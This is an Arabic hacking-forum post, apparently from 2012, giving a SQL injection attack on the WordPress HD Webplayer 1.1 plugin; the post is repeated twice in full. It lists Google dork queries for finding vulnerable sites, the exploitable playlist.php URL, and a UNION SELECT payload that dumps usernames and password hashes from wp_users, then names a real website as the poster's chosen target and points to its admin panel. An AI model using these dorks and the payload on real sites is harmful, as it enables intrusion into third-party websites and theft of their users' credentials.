خبوش
09-03-2012, 05:40 AM
السلام عليكم ورحمة الله وبركاته
وصف لسكربت
WordPress (http://ar.wordpress.com/)
سكربت ممل سكربت يسبب لك الخطر بموقعك وهو يجيب لك راس منتدى بنسبة 100% على سيرفر عام
ماهي أشهر ثغراته المصاب بها ثغرات الحقن .
يالله فداكم ثغرة . :
الاصدار المصاب : Webplayer 1.1
نوع الثغرة : تثغرة ٍ حقن الي ما يعرف يحقن يدوي يستخدم الهافج
دورك في محرك البحث قوقل
1
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
2
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
3
inurl:"/wp-content/plugins/hd-webplayer/"
---------------------------------------
هذا رابط الاستغلال xxxx.com/vb//plugins/hd-webplayer/playlist.php?videoid=
تستبدل xxxx برابط الموقع
تستبدل vb بمسار السكربت
------------------------
هذا استغلال الحقن اليدوي
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID*0x3a*user_login*0x3a*user_pass*0x 3b)*2*3*4*5*6*7+from+wp_users //Number of columns may be different
المهم
تابع الشرح المصور
انا اخترت الهدف هذا
http://metodistadesuzano.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=4
http://im14.gulfup.com/2012-09-01/1346478290331.png
http://im14.gulfup.com/2012-09-01/1346478290222.png
http://im14.gulfup.com/2012-09-01/1346478290173.png
http://im14.gulfup.com/2012-09-01/134647829024.png
http://im14.gulfup.com/2012-09-01/1346478290405.png
http://im14.gulfup.com/2012-09-01/1346478290696.png
وبكذا أنجزنا المهمه . مسار لوحة التحكم
http://www.example.com/wp-admin
وصف لسكربت
WordPress (http://ar.wordpress.com/)
سكربت ممل سكربت يسبب لك الخطر بموقعك وهو يجيب لك راس منتدى بنسبة 100% على سيرفر عام
ماهي أشهر ثغراته المصاب بها ثغرات الحقن .
يالله فداكم ثغرة . :
الاصدار المصاب : Webplayer 1.1
نوع الثغرة : تثغرة ٍ حقن الي ما يعرف يحقن يدوي يستخدم الهافج
دورك في محرك البحث قوقل
1
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
2
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
3
inurl:"/wp-content/plugins/hd-webplayer/"
---------------------------------------
هذا رابط الاستغلال xxxx.com/vb//plugins/hd-webplayer/playlist.php?videoid=
تستبدل xxxx برابط الموقع
تستبدل vb بمسار السكربت
------------------------
هذا استغلال الحقن اليدوي
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID*0x3a*user_login*0x3a*user_pass*0x 3b)*2*3*4*5*6*7+from+wp_users //Number of columns may be different
المهم
تابع الشرح المصور
انا اخترت الهدف هذا
http://metodistadesuzano.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=4
http://im14.gulfup.com/2012-09-01/1346478290331.png
http://im14.gulfup.com/2012-09-01/1346478290222.png
http://im14.gulfup.com/2012-09-01/1346478290173.png
http://im14.gulfup.com/2012-09-01/134647829024.png
http://im14.gulfup.com/2012-09-01/1346478290405.png
http://im14.gulfup.com/2012-09-01/1346478290696.png
وبكذا أنجزنا المهمه . مسار لوحة التحكم
http://www.example.com/wp-admin